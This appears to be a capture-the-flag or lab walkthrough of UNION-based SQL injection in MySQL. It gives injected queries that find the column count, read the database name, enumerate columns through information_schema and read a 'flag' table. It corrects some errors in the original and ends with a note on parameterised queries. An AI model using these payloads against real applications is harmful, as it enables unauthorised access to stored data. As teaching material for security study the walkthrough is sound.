Step 1 — determine how many columns the vulnerable query returns. Append `order by N` with increasing N to the injected `id` value: `select * from news where id=1 order by 1` succeeds while N is no larger than the number of columns produced by the `select *`, and the query errors once N exceeds it. The last N that works is the column count the UNION payload must match. (Original explanatory text was lost to mis-encoding; the description above is reconstructed from the SQL that survived.)
Step 2 — with the column count known (two here), inject a second SELECT through UNION: `select * from news where id=1 and 1=2 union select 1,database()`. The `and 1=2` makes the original WHERE clause false so the page renders only the injected row; `database()` returns the name of the schema the connection is currently using.
Step 3 — use the `information_schema.columns` view to enumerate the columns of the target table. Because the page shows only one row, `group_concat` collapses every matching column name into a single comma-separated string: `select * from news where id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'`. Caveat: filtering on `table_name` alone matches any schema that has a table named `flag`; add `and table_schema=database()` (or the schema name from the previous step) to avoid mixing in columns from another database.
`information_schema` is MySQL's built-in metadata schema (available since MySQL 5.0); it describes every database, table and column the current account is allowed to see. Its `tables` view is queried like any other table, e.g. `select * from information_schema.tables where table_schema='sqli'`.
`group_concat` joins the values of one column across all rows into a single string, which is what makes multi-row metadata readable through a page that displays one row. `union` appends the result of a second SELECT to the first; both SELECTs must return the same number of columns (with compatible types), which is why the column count from step 1 matters: `select * from news where id=1 and 1=2 union select 1,database()`.
To list all databases, query the `schemata` view: `select schema_name from information_schema.schemata`. Note: the original text showed `select * from information_schema.databases`, but MySQL has no `information_schema.databases` table — that statement fails with an "unknown table" error. `schemata` (or `show databases`) is the correct source.
To count the tables in the `sqli` database: `select count(*) from information_schema.tables where table_schema='sqli'`
To list the table names in the `sqli` database: `select table_name from information_schema.tables where table_schema='sqli'`
To list the columns of the `flag` table: `select column_name from information_schema.columns where table_name='flag'`. As above, add `and table_schema='sqli'` so a same-named table in another schema is not included.
Finally, read the data with a schema-qualified query: `select * from sqli.flag`. Defensive note: every step above works only because the `id` value is concatenated into the SQL string; binding it as a parameter (`where id = ?`) removes the injection point entirely, and restricting the application account's privileges limits how much of `information_schema` an attacker can enumerate.